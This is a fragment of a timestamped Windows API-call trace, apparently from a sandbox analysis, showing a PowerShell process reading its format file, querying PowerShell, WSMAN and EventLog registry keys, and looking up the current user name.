	[0534.619] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0534.619] GetFileType (hFile=0x2e8) returned 0x1
	[0534.619] SetErrorMode (uMode=0x1) returned 0x1
	[0534.619] GetFileType (hFile=0x2e8) returned 0x1
	[0534.619] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272d98*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0534.619] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272d98*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0534.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272d98*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0534.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272d98*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0534.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272d98*, lpNumberOfBytesRead=0x12cfd8*=0xe98, lpOverlapped=0x0) returned 1
	[0534.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272398, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272398*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0534.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x3272d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3272d98*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0534.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x2e8) returned 0x0
	[0534.620] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0534.621] CoTaskMemAlloc (cb=0x5a) returned 0x376d70
	[0534.621] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x376d70, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0534.621] CoTaskMemFree (pv=0x376d70) 
	[0534.621] RegCloseKey (hKey=0x2e8) returned 0x0
	[0534.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0534.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0534.622] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2ef30ed, Data2=0x6dd3, Data3=0x4397, Data4=([0]=0xb7, [1]=0x0, [2]=0x14, [3]=0x1a, [4]=0x26, [5]=0x59, [6]=0x35, [7]=0x3d))) returned 0x0
	[0534.622] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8123a0ed, Data2=0xcb10, Data3=0x4855, Data4=([0]=0xab, [1]=0x1f, [2]=0x8c, [3]=0xea, [4]=0xb7, [5]=0x61, [6]=0xd8, [7]=0x15))) returned 0x0
	[0534.632] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.632] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.632] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.632] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.632] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.633] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.633] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.633] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.642] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.643] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.648] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.649] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.650] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0534.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.650] CoTaskMemFree (pv=0x2c1dd0) 
	[0534.656] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x2e8) returned 0x0
	[0534.660] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d17c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d178*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.660] CoTaskMemFree (pv=0x0) 
	[0534.661] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0534.661] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x0, lpValueName=0x301a20, lpcchValueName=0x12d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0534.661] CoTaskMemFree (pv=0x301a20) 
	[0534.661] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0534.661] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x1, lpValueName=0x301a20, lpcchValueName=0x12d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0534.661] CoTaskMemFree (pv=0x301a20) 
	[0534.661] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0534.661] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x2, lpValueName=0x301a20, lpcchValueName=0x12d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0534.661] CoTaskMemFree (pv=0x301a20) 
	[0535.578] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d20c, lpData=0x0, lpcbData=0x12d208*=0x0 | out: lpType=0x12d20c*=0x1, lpData=0x0, lpcbData=0x12d208*=0x8) returned 0x0
	[0535.578] CoTaskMemAlloc (cb=0xc) returned 0x1b827570
	[0535.578] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d1dc, lpData=0x1b827570, lpcbData=0x12d1d8*=0x8 | out: lpType=0x12d1dc*=0x1, lpData="2.0", lpcbData=0x12d1d8*=0x8) returned 0x0
	[0535.578] CoTaskMemFree (pv=0x1b827570) 
	[0537.502] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1c8 | out: phkResult=0x12d1c8*=0x2e8) returned 0x0
	[0537.502] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d0cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d0cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.502] CoTaskMemFree (pv=0x0) 
	[0537.502] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.502] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x0, lpValueName=0x301a20, lpcchValueName=0x12d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0537.503] CoTaskMemFree (pv=0x301a20) 
	[0537.503] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.503] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x1, lpValueName=0x301a20, lpcchValueName=0x12d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0537.503] CoTaskMemFree (pv=0x301a20) 
	[0537.503] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.503] RegEnumValueW (in: hKey=0x2e8, dwIndex=0x2, lpValueName=0x301a20, lpcchValueName=0x12d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0537.503] CoTaskMemFree (pv=0x301a20) 
	[0537.503] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d15c, lpData=0x0, lpcbData=0x12d158*=0x0 | out: lpType=0x12d15c*=0x1, lpData=0x0, lpcbData=0x12d158*=0x8) returned 0x0
	[0537.503] CoTaskMemAlloc (cb=0xc) returned 0x1b827830
	[0537.503] RegQueryValueExW (in: hKey=0x2e8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d12c, lpData=0x1b827830, lpcbData=0x12d128*=0x8 | out: lpType=0x12d12c*=0x1, lpData="2.0", lpcbData=0x12d128*=0x8) returned 0x0
	[0537.503] CoTaskMemFree (pv=0x1b827830) 
	[0537.504] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0537.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.504] CoTaskMemFree (pv=0x2c1dd0) 
	[0537.509] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0537.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.509] CoTaskMemFree (pv=0x2c1dd0) 
	[0537.515] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1f8 | out: phkResult=0x12d1f8*=0x308) returned 0x0
	[0537.519] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d16c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d168*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.520] CoTaskMemFree (pv=0x0) 
	[0537.520] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.520] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.521] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.521] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.521] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.521] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.521] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.521] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.521] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.521] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.521] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.521] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.521] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.521] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.521] CoTaskMemFree (pv=0x301a20) 
	[0537.521] CoTaskMemFree (pv=0x0) 
	[0537.522] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.522] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.522] CoTaskMemFree (pv=0x301a20) 
	[0537.522] CoTaskMemFree (pv=0x0) 
	[0537.522] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0537.522] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x301a20, lpcchName=0x12d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0537.522] CoTaskMemFree (pv=0x301a20) 
	[0537.522] CoTaskMemFree (pv=0x0) 
	[0537.522] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x30c) returned 0x0
	[0537.522] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.522] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x310) returned 0x0
	[0537.522] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.522] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x320) returned 0x0
	[0537.522] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.522] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x338) returned 0x0
	[0537.523] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.523] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x33c) returned 0x0
	[0537.523] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.523] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x340) returned 0x0
	[0537.523] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.523] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x344) returned 0x0
	[0537.523] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.523] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x348) returned 0x0
	[0537.523] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x0) returned 0x2
	[0537.523] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x34c) returned 0x0
	[0537.523] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d258 | out: phkResult=0x12d258*=0x350) returned 0x0
	[0537.524] RegCloseKey (hKey=0x350) returned 0x0
	[0537.524] RegCloseKey (hKey=0x308) returned 0x0
	[0537.525] RegCloseKey (hKey=0x34c) returned 0x0
	[0537.533] CoTaskMemAlloc (cb=0x804) returned 0x1b847e40
	[0537.534] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b847e40, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0538.550] CoTaskMemFree (pv=0x1b847e40) 
	[0538.551] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.551] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0538.551] CoTaskMemFree (pv=0x301a20) 
	[0538.590] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1a8 | out: phkResult=0x12d1a8*=0x354) returned 0x0
	[0538.590] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.590] CoTaskMemFree (pv=0x0) 
	[0538.590] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.590] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.590] CoTaskMemFree (pv=0x301a20) 
	[0538.590] CoTaskMemFree (pv=0x0) 
	[0538.590] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.590] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.590] CoTaskMemFree (pv=0x301a20) 
	[0538.590] CoTaskMemFree (pv=0x0) 
	[0538.590] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.591] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.591] CoTaskMemFree (pv=0x301a20) 
	[0538.591] CoTaskMemFree (pv=0x0) 
	[0538.591] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.591] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.591] CoTaskMemFree (pv=0x301a20) 
	[0538.591] CoTaskMemFree (pv=0x0) 
	[0538.591] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.591] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.591] CoTaskMemFree (pv=0x301a20) 
	[0538.591] CoTaskMemFree (pv=0x0) 
	[0538.591] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.591] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.591] CoTaskMemFree (pv=0x301a20) 
	[0538.591] CoTaskMemFree (pv=0x0) 
	[0538.591] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.591] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.592] CoTaskMemFree (pv=0x301a20) 
	[0538.592] CoTaskMemFree (pv=0x0) 
	[0538.592] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.592] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.592] CoTaskMemFree (pv=0x301a20) 
	[0538.592] CoTaskMemFree (pv=0x0) 
	[0538.592] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0538.592] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x301a20, lpcchName=0x12d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.592] CoTaskMemFree (pv=0x301a20) 
	[0538.592] CoTaskMemFree (pv=0x0) 
